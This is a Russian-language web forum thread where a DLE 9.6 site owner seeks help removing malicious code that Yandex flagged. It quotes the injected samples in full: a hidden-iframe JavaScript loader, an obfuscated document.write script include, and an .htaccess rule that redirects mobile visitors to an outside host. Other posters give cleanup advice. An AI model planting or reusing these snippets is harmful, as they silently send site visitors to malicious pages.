Перейти к публикации

Рекомендованные сообщения

Помогите найти вредоносный код , пришло письмо от яндекса.

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в .js-скриптах вредоносный код следующего содержания:

var if1S9Ph = document.createElement('iframe');if1S9Ph.name = 'if1S9Ph';if1S9Ph.src = 'http://dfbs.funentry.com/';if1S9Ph.style.width = '0px';if1S9Ph.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if1S9Ph=') == -1) { document.getElementsByTagName('body')[0].appendChild(if1S9Ph); document.cookie = 'if1S9Ph=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}};

Если сделать с админки восстановления базы проблема изчезнет?

Ссылка на сообщение
Поделиться на других сайтах

код не обязательно в бд, даже скорей всего не там. он может быть и в файлах шаблона и самого движка.

Ссылка на сообщение
Поделиться на других сайтах

Как можно скачать версию dle 9.6, у меня годовая лицензия давно закончилась, хочу переустановить движок, никак вредоносный код не найду, скачивать где попало не охота

Ссылка на сообщение
Поделиться на других сайтах

Вредоносный код так и не нашел, пару дней назад появилось вот такое: Mogaso.ws - пїЅпїЅпїЅпїЅпїЅпїЅ, пїЅпїЅпїЅпїЅ, пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ... И в админ панели где описание сайта тоже самое. Как найти этот код? Прога ai-bolit не помогла.

Ссылка на сообщение
Поделиться на других сайтах

Mogaso.ws
Ваш сайт? Если да, то сочувствую:

Сторінка звітована як нападницька!

Цю веб-сторінку на mogaso.ws було відзвітовано як нападницьку, тому вона була заблокована згідно з вашими вподобаннями безпеки.

Нападницькі сторінки намагаються встановити програми що крадуть конфіденційну інформацію, використовують ваш комп’ютер для подальших атак чи ушкоджують вашу систему.Деякі нападницькі сторінки навмисно розповсюджують шкідливі програми, проте чимало використовуються втемну, без відома та дозволу їх хазяїв.

Если Могасо не ваше, дайте адрес сайта.

Ссылка на сообщение
Поделиться на других сайтах

ai-bolit, замена подозрительных файлов (/engine/inc/include/init.php, все js-файлы, проверка htaccess), установить все патчи для 9,6 с оффсайта. Видимо патчи не ставили? только что чистил на заказ , тоже 9,6 без патчей стоял, та же картина.

Ссылка на сообщение
Поделиться на других сайтах

ai-bolit, замена подозрительных файлов (/engine/inc/include/init.php, все js-файлы, проверка htaccess), установить все патчи для 9,6 с оффсайта. Видимо патчи не ставили? только что чистил на заказ , тоже 9,6 без патчей стоял, та же картина.

Патчи все установлены, с последним опоздал уже поставил когда на сайте появился вирус

Ссылка на сообщение
Поделиться на других сайтах

Патчи все установлены, с последним опоздал уже поставил когда на сайте появился вирус

Последний не может привести к вирусу, он от другого предназначен.

Вирус у вас судя по всему в шаблоне, а именно в коде


<script type="text/javascript">var s = "w.bi";var m = Math.floor(Math.random()*15000);var v = "ru";document.write('<s'+'cr'+'ipt language="javascript" charset="windows-1251" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+s+'str4.'+v+'/go.php?id=2733&m='+m+'"><'+'/scr'+'ipt>');</script>
[/CODE]

Ссылка на сообщение
Поделиться на других сайтах

Патчи все установлены, с последним опоздал уже поставил когда на сайте появился вирус

Последний не может привести к вирусу, он от другого предназначен.

Вирус у вас судя по всему в шаблоне, а именно в коде


<script type="text/javascript">var s = "w.bi";var m = Math.floor(Math.random()*15000);var v = "ru";document.write('<s'+'cr'+'ipt language="javascript" charset="windows-1251" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+s+'str4.'+v+'/go.php?id=2733&m='+m+'"><'+'/scr'+'ipt>');</script>

это код баннера, я его удалял проверял на яндексе, все равно пишет вредоносный код и вчера поставил обратно баннер

Ссылка на сообщение
Поделиться на других сайтах

Anatoliy03,

На данный момент я не вижу никаких вирусов на сайте, если вы его удалили, то нужно ждать пока яндекс переиндексирует сайт, чтобы ускорить процедуру можно написать в поддержку яндекса

Ссылка на сообщение
Поделиться на других сайтах

Anatoliy03,

На данный момент я не вижу никаких вирусов на сайте, если вы его удалили, то нужно ждать пока яндекс переиндексирует сайт, чтобы ускорить процедуру можно написать в поддержку яндекса

Сегодня опять появился файп при проверке ативирусом движка ./info.php 18 b 29.08.2013 17:27:30

неизвестен дистрибутиву

Вчера удалил, сегодня антивирус показывает, что есть но я его не нахожу, где он может быть?

Если переустановлю движок проблема исчезнет и как правильно переустановить, по инструкции обновления?

яндекс и google показывают, что вредононый код присутствует

http://mogaso.ws/books/38413-osnovy-klassicheskoy-kriptologii-sekrety-shifrov-i-kodov-adamenko-mv-2012.html

Поведенческий анализ

http://mogaso.ws/books/51152-romanov-german-spasti-kappelya-pod-belo-zelenym-znamenem-audiokniga.html

Ссылка на сообщение
Поделиться на других сайтах

Сегодня опять появился файп при проверке ативирусом движка ./info.php 18 b 29.08.2013 17:27:30 неизвестен дистрибутиву Вчера удалил, сегодня антивирус показывает, что есть но я его не нахожу, где он может быть?

файл размером 18 байт, туда вирус вряд ли поместится. Приведите содержимое этого файла.

Если переустановлю движок проблема исчезнет и как правильно переустановить, по инструкции обновления?

Да по инструкции по обновлению.

яндекс и google показывают, что вредононый код присутствует

Уберите все сторонние JS скрипты из вашего шаблона и вашу рекламу, и напишите в яндекс чтобы сайт был перепроверен. У меня вызывают большие сомнения ваши рекламные коды, зловредный код может и в рекламе быть и загружаться со сторонних сайтов.

Ссылка на сообщение
Поделиться на других сайтах

Сегодня опять появился файп при проверке ативирусом движка ./info.php 18 b 29.08.2013 17:27:30 неизвестен дистрибутиву Вчера удалил, сегодня антивирус показывает, что есть но я его не нахожу, где он может быть?

файл размером 18 байт, туда вирус вряд ли поместится. Приведите содержимое этого файла.

Если переустановлю движок проблема исчезнет и как правильно переустановить, по инструкции обновления?

Да по инструкции по обновлению.

яндекс и google показывают, что вредононый код присутствует

Уберите все сторонние JS скрипты из вашего шаблона и вашу рекламу, и напишите в яндекс чтобы сайт был перепроверен. У меня вызывают большие сомнения ваши рекламные коды, зловредный код может и в рекламе быть и загружаться со сторонних сайтов.

Ответ яндекса:

Cайт был перепроверен 2 Сентября 2013. К сожалению, на сайте остались страницы, содержащие вредоносный код.

Ссылка на сообщение
Поделиться на других сайтах

удали шаблон, и поставь что в стандарте с движком шел, и проверяй, может с шаблона все и началось, а также проверяй все скрипты, лучше дай код кому нибудь сведущему в этих делах!

Ссылка на сообщение
Поделиться на других сайтах

Вот удалил во всех файлах htaccess

RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|iemobile|nokia|ucweb|ucbrowser) [NC]

RewriteCond %{HTTP_USER_AGENT} !(bot|accoona|ia_archiver|antabot|ask jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]

RewriteRule (.*) http://in.getpdaupd.net/?19&source=46.165.223.4 [L,R=302] #

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...